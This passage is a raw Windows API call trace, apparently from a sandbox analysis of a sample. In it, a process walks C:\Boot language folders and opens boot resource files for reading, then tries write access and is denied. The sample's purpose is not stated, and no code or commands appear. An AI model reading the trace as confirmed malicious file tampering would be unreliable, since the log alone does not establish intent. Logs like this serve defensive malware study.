lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.466] AreFileApisANSI () returned 1 [0070.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pt-BR\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pt-BR\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.467] AreFileApisANSI () returned 1 [0070.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0070.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-BR\\memtest.exe.mui") returned 30 [0070.467] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.467] GetFileType (hFile=0x41c) returned 0x1 [0070.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.467] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.467] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.468] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.545] CloseHandle (hObject=0x41c) returned 1 [0070.545] AreFileApisANSI () returned 1 [0070.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x536d0 [0070.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x536d0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-BR\\memtest.exe.mui") returned 30 [0070.545] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.545] GetLastError () returned 0x5 [0070.545] GetLastError () returned 0x5 [0070.546] SetLastError (dwErrCode=0x5) [0070.546] GetLastError () returned 0x5 [0070.546] SetLastError (dwErrCode=0x5) [0070.546] GetLastError () returned 0x5 [0070.546] SetLastError (dwErrCode=0x5) [0070.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.546] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x693f8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓놠")) returned 0 [0070.546] FindClose (in: hFindFile=0x78450 | out: hFindFile=0x78450) returned 1 [0070.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0070.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.547] AreFileApisANSI () returned 1 [0070.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pt-PT", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pt-PT", lpUsedDefaultChar=0x0) returned 14 [0070.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0070.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.547] AreFileApisANSI () returned 1 [0070.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887e8 [0070.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x887e8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\pt-PT") returned 14 [0070.547] CreateFileW (lpFileName="C:\\Boot\\pt-PT" (normalized: "c:\\boot\\pt-pt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.548] GetLastError () returned 0x5 [0070.548] GetLastError () returned 0x5 [0070.548] SetLastError (dwErrCode=0x5) [0070.548] GetLastError () returned 0x5 [0070.548] SetLastError (dwErrCode=0x5) [0070.548] GetLastError () returned 0x5 [0070.548] SetLastError (dwErrCode=0x5) [0070.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.548] AreFileApisANSI () returned 1 [0070.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88400 [0070.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\pt-PT") returned 14 [0070.548] CreateFileW (lpFileName="C:\\Boot\\pt-PT" (normalized: "c:\\boot\\pt-pt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.548] GetLastError () returned 0x5 [0070.548] GetLastError () returned 0x5 [0070.548] SetLastError (dwErrCode=0x5) [0070.548] GetLastError () returned 0x5 [0070.548] SetLastError (dwErrCode=0x5) [0070.548] GetLastError () returned 0x5 [0070.548] SetLastError (dwErrCode=0x5) [0070.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.549] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0070.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.549] FindFirstFileExW (in: lpFileName="C:\\Boot\\pt-PT\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78090 [0070.550] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.550] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0070.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0070.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0070.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.551] AreFileApisANSI () returned 1 [0070.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pt-PT\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0070.551] AreFileApisANSI () returned 1 [0070.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x536d0 [0070.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x536d0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 30 [0070.551] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.552] GetFileType (hFile=0x41c) returned 0x1 [0070.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.552] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.552] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.552] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.552] CloseHandle (hObject=0x41c) returned 1 [0070.552] AreFileApisANSI () returned 1 [0070.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0070.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 30 [0070.553] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.553] GetLastError () returned 0x5 [0070.553] GetLastError () returned 0x5 [0070.553] SetLastError (dwErrCode=0x5) [0070.553] GetLastError () returned 0x5 [0070.553] SetLastError (dwErrCode=0x5) [0070.553] GetLastError () returned 0x5 [0070.553] SetLastError (dwErrCode=0x5) [0070.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) 